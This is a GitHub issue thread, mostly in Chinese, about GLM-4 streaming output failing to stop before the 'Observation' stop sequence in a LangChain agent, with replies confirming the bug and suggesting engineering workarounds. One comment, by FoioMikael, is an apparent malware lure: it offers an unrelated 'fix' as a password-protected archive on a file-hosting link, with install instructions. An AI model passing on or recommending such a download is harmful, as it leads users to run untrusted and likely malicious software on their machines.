### ISSUE TITLE
Agent流式输出停止符问题

### ISSUE THREAD

**Issue by HuMian10** [THUDM/GLM-4#511]
### System Info / 系統信息

调用方式：langchain_openai
模型：zhipuAI官方API的glm4

### Who can help? / 谁可以帮助到您？

@wwewwt @Sengxian @davidlvxin @codazzy 

### Information / 问题信息

- [X] The official example scripts / 官方的示例脚本
- [ ] My own modified scripts / 我自己修改的脚本和任务

### Reproduction / 复现过程

在使用glm4做agent时，流式输出设置的stop参数为Observation，但是模型实际输出时依然会输出Observation字符，而不是停止于该字符之前，导致Action Input的结果会包含Observation字符，这个问题是我的设置导致的，还是glm4在定义stop函数时默认会把停止符输出后再停止？
![image](https://github.com/user-attachments/assets/0b6728cb-7e44-42cc-95a3-5d47ac3481b4)

### Expected behavior / 期待表现

谢谢指导！

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gyhlearner** [comment]
看起来glm是不支持stop sequence特性的

**Comment by gyhlearner** [comment]
我也遇到这样的问题

**Comment by zRzRzRzRzRzRzR** [comment]
对，目前要用工程来遏制，或者直接指定这个token
为stop token
